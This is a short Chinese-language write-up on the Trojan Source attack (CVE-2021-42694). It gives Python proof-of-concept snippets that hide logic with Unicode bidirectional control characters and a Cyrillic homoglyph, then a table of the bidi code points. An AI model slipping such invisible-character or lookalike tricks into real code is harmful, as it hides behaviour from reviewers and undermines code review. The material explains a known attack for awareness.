【CVE-2021-42694】Trojan Source木马源攻击

1. `RLO LRI('ΓÇ«Γüª')` 和 `PDI LRI('Γü⌐Γüª')` 使用

1.1 使用`DOS(CP437)`编码

access_level = "user"

if access_level != 'noneΓÇ«Γüª': # Check if admin Γü⌐Γüª' and access_level != 'user
    print("You are an admin.")

1.2 使用`utf-8` 编码转换后（vscode： Reopen with Encoding）

access_level = "user"

if access_level != 'none‮⁦': # Check if admin ⁩⁦' and access_level != 'user
    print("You are an admin.")

2. RLI使用`('Γüº')`

2.1 使用`DOS(CP437)`编码

bank = { 'alice': 100 }

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then Γüº''' ;return
    bank[account] -= amount
    return

subtract_funds('alice', 50)
print(bank)

2.2 使用`utf-8` 编码转换后

bank = { 'alice': 100 }

def subtract_funds(account: str, amount: int):
    ''' Subtract funds from bank account then ⁧''' ;return
    bank[account] -= amount
    return

subtract_funds('alice', 50)
print(bank)

3. `'╨¥'`(西里尔字母H)使用

3.1 使用`DOS(CP437)`编码

def say╨¥ello():
    print("Goodbye, World!")

def sayHello():
    print("Hello, World!")

say╨¥ello()

3.2 使用`utf-8` 编码转换后 `╨¥` 变为类似`H`的字符

def sayНello():
    print("Goodbye, World!")

def sayHello():
    print("Hello, World!")

sayНello()

参考

Abbreviation	Code Point	Name	Description
LRE	U+202A	Left-to-Right Embedding	尝试将以下文本视为从左到右
RLE	U+202B	Right-to-Left Embedding	尝试将以下文本视为从右到左
LRO	U+202D	Left-to-Right Override	强制将以下文本视为从左到右
RLO	U+202E	Right-to-Left Override	强制将以下文本视为从右到左
LRI	U+2066	Left-to-Right Isolate	强制将后续文本视为从左到右，而不影响相邻文本
RLI	U+2067	Right-to-Left Isolate	强制将后续文本视为从右到左，而不影响相邻文本
FSI	U+2068	First Strong Isolate	强制按照下一个字符指示的方向处理后续文本
PDF	U+202C	Pop Directional Formatting	终止最近的 LRE.RLE.LRO 或 RLO
PDI	U+2069	Pop Directional Isolate	终止最近的 LRI 或 RLI